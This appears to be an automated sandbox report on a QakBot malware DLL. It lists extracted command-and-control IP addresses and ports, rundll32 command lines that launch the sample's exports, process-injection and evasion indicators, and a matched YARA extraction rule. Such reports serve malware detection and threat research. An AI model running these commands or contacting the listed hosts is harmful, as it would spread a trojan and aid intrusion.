Source: Malware configuration extractor	IPs: 103.141.50.43:995
Source: Malware configuration extractor	IPs: 85.101.239.116:443
Source: Malware configuration extractor	IPs: 103.42.86.42:995
Source: Malware configuration extractor	IPs: 92.1.170.110:995
Source: Malware configuration extractor	IPs: 81.229.117.95:2222
Source: Malware configuration extractor	IPs: 124.122.47.148:443
Source: Malware configuration extractor	IPs: 103.212.19.254:995
Source: Malware configuration extractor	IPs: 103.139.242.6:443
Source: Malware configuration extractor	IPs: 125.99.76.102:443
Source: Malware configuration extractor	IPs: 50.68.186.195:443
Source: Malware configuration extractor	IPs: 47.205.25.170:443
Source: Malware configuration extractor	IPs: 12.172.173.82:993
Source: Malware configuration extractor	IPs: 12.172.173.82:22
Source: Malware configuration extractor	IPs: 70.28.50.223:32100
Source: Malware configuration extractor	IPs: 79.168.224.165:2222
Source: Malware configuration extractor	IPs: 121.121.108.120:995
Source: Malware configuration extractor	IPs: 69.160.121.6:61201
Source: Malware configuration extractor	IPs: 200.84.211.255:2222
Source: Malware configuration extractor	IPs: 201.244.108.183:995
Source: Malware configuration extractor	IPs: 93.187.148.45:443
Source: Malware configuration extractor	IPs: 85.61.165.153:2222
Source: Malware configuration extractor	IPs: 184.182.66.109:443
Source: Malware configuration extractor	IPs: 175.156.217.7:2222
Source: Malware configuration extractor	IPs: 70.28.50.223:3389
Source: Malware configuration extractor	IPs: 114.143.176.236:443
Source: Malware configuration extractor	IPs: 65.95.141.84:2222
Source: Malware configuration extractor	IPs: 80.6.50.34:443
Source: Malware configuration extractor	IPs: 12.172.173.82:2087
Source: Malware configuration extractor	IPs: 47.199.241.39:443
Source: Malware configuration extractor	IPs: 66.241.183.99:443
Source: Malware configuration extractor	IPs: 113.11.92.30:443
Source: Malware configuration extractor	IPs: 186.75.95.6:443
Source: Malware configuration extractor	IPs: 125.99.69.178:443
Source: Malware configuration extractor	IPs: 109.130.247.84:2222
Source: Malware configuration extractor	IPs: 96.56.197.26:2222
Source: Malware configuration extractor	IPs: 70.50.1.252:2222
Source: Malware configuration extractor	IPs: 91.160.70.68:32100
Source: Malware configuration extractor	IPs: 67.70.120.249:2222
Source: Malware configuration extractor	IPs: 209.171.160.69:995
Source: Malware configuration extractor	IPs: 98.163.227.79:443
Source: Malware configuration extractor	IPs: 176.133.4.230:995
Source: Malware configuration extractor	IPs: 24.234.220.88:995
Source: Malware configuration extractor	IPs: 45.62.75.250:443
Source: Malware configuration extractor	IPs: 200.44.198.47:2222
Source: Malware configuration extractor	IPs: 173.17.45.60:443
Source: Malware configuration extractor	IPs: 5.192.141.228:2222
Source: Malware configuration extractor	IPs: 184.63.133.131:995
Source: Malware configuration extractor	IPs: 70.28.50.223:2083
Source: Malware configuration extractor	IPs: 78.82.143.154:2222
Source: Malware configuration extractor	IPs: 73.88.173.113:443
Source: Malware configuration extractor	IPs: 181.4.225.225:443
Source: Malware configuration extractor	IPs: 24.234.220.88:443
Source: Malware configuration extractor	IPs: 174.58.146.57:443

Source: Joe Sandbox View	ASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox View	ASN Name: MEO-RESIDENCIALPT MEO-RESIDENCIALPT

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View

IP Address: 2.82.8.80 2.82.8.80

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, /User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: xfinity.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, /User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: xfinity.comCache-Control: no-cacheCookie: xpgn=1

Source: unknown

Network traffic detected: IP country count 27

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725

Source: unknown	TCP traffic detected without corresponding DNS query: 85.101.239.116
Source: unknown	TCP traffic detected without corresponding DNS query: 85.101.239.116
Source: unknown	TCP traffic detected without corresponding DNS query: 85.101.239.116

Source: national[1].htm.22.dr

String found in binary or memory: Find tutorials and demos\u003C\u002Fa\u003E\u003C\u002Fli\u003E\u003Cli\u003E\u003Ca rel=\"nofollow\" href=\"https:\u002F\u002Fwww.facebook.com\u002Fxfinity\"\u003EFacebook equals www.facebook.com (Facebook)

Source: 050_qbot.dll	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 050_qbot.dll	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: 050_qbot.dll	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 050_qbot.dll	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: 050_qbot.dll	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 050_qbot.dll	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 050_qbot.dll	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: 050_qbot.dll	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 050_qbot.dll	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 050_qbot.dll	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 050_qbot.dll	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: 050_qbot.dll	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 050_qbot.dll	String found in binary or memory: http://ocsp.digicert.com0C
Source: 050_qbot.dll	String found in binary or memory: http://ocsp.digicert.com0H
Source: 050_qbot.dll	String found in binary or memory: http://ocsp.digicert.com0I
Source: 050_qbot.dll	String found in binary or memory: http://ocsp.digicert.com0O
Source: Amcache.hve.8.dr	String found in binary or memory: http://upx.sf.net
Source: 050_qbot.dll	String found in binary or memory: http://www.digicert.com/CPS0
Source: 050_qbot.dll	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 050_qbot.dll	String found in binary or memory: https://www.digicert.com/CPS0
Source: national[1].htm.22.dr	String found in binary or memory: https://www.xfinity.com/learn/internet-service/acp
Source: national[1].htm.22.dr	String found in binary or memory: https://www.xfinity.com/mobile/policies/broadband-disclosures
Source: national[1].htm.22.dr	String found in binary or memory: https://www.xfinity.com/networkmanagement

Source: unknown

DNS traffic detected: queries for: xfinity.com

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, /User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: xfinity.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, /User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: xfinity.comCache-Control: no-cacheCookie: xpgn=1

Source: unknown

HTTPS traffic detected: 68.87.41.40:443 -> 192.168.2.3:49720 version: TLS 1.2

Source: loaddll32.exe, 00000000.00000002.394701031.0000000000ECB000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: 050_qbot.dll

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, 32BIT_MACHINE, DLL

Source: 16.2.rundll32.exe.2960978.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
Source: 16.2.rundll32.exe.10000000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
Source: 16.2.rundll32.exe.2960978.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7348 -s 652

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\Windows\AppCompat\Programs\Amcache.hve.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ADAACE0	3_2_6ADAACE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6ADA6880	3_2_6ADA6880
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_10018E20	16_2_10018E20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_10003A40	16_2_10003A40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_100172EF	16_2_100172EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_100132F1	16_2_100132F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_10016F30	16_2_10016F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_10014B53	16_2_10014B53

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_100144D8 NtProtectVirtualMemory,NtProtectVirtualMemory,	16_2_100144D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_1000A51F NtAllocateVirtualMemory,NtWriteVirtualMemory,	16_2_1000A51F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_1000A93E GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,	16_2_1000A93E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_1000AA38 GetLastError,NtResumeThread,FindCloseChangeNotification,	16_2_1000AA38
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_1000CAF3 NtAllocateVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,	16_2_1000CAF3

Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wermgr.exe	Section loaded: ncryptsslp.dll

Source: 050_qbot.dll

Static PE information: Number of sections : 15 > 10

Source: 050_qbot.dll	ReversingLabs: Detection: 45%
Source: 050_qbot.dll	Virustotal: Detection: 57%

Source: 050_qbot.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\050_qbot.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\050_qbot.dll,lcopy_block_row
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7348 -s 652
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7360 -s 176
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\050_qbot.dll,lcopy_sample_rows
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\050_qbot.dll,ldiv_round_up
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",lcopy_block_row
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",lcopy_sample_rows
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",ldiv_round_up
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",next
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",lround_up
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",lpeg_write_tables
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 652
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7716 -s 652
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\050_qbot.dll,lcopy_block_row	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\050_qbot.dll,lcopy_sample_rows	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\050_qbot.dll,ldiv_round_up	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",lcopy_block_row	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",lcopy_sample_rows	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",ldiv_round_up	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",next	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",lround_up	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",lpeg_write_tables	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe	Jump to behavior

Source: C:\Windows\SysWOW64\wermgr.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Rtindcnm

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERDC44.tmp

Jump to behavior

Source: classification engine

Classification label: mal96.troj.evad.winDLL@30/21@2/100

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 16_2_1000D2F7 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,

16_2_1000D2F7

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 16_2_1000C800 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,

16_2_1000C800

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\050_qbot.dll,lcopy_block_row

Source: C:\Windows\SysWOW64\wermgr.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{650076D1-C3AE-46B5-834A-1C657E63570E}
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7360
Source: C:\Windows\SysWOW64\wermgr.exe	Mutant created: \Sessions\1\BaseNamedObjects\{650076D1-C3AE-46B5-834A-1C657E63570E}
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7716
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7644
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7348
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_01
Source: C:\Windows\SysWOW64\wermgr.exe	Mutant created: \Sessions\1\BaseNamedObjects\{D340C8CB-9E8A-4470-A2C5-E9870EB18242}

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\wermgr.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\wermgr.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\wermgr.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: 050_qbot.dll

Static PE information: More than 104 > 100 exports found

Source: 050_qbot.dll

Static PE information: Image base 0x6ad80000 > 0x60000000

Source: 050_qbot.dll	Static PE information: section name: /4
Source: 050_qbot.dll	Static PE information: section name: /14
Source: 050_qbot.dll	Static PE information: section name: /29
Source: 050_qbot.dll	Static PE information: section name: /41
Source: 050_qbot.dll	Static PE information: section name: /55
Source: 050_qbot.dll	Static PE information: section name: /67

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6AD814B0 GetModuleHandleA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,

3_2_6AD814B0

Source: 050_qbot.dll

Static PE information: real checksum: 0xc341d should be: 0xbfd40

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Windows\SysWOW64\rundll32.exe

Memory written: PID: 7868 base: 1193C50 value: E9 63 D7 40 FF

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
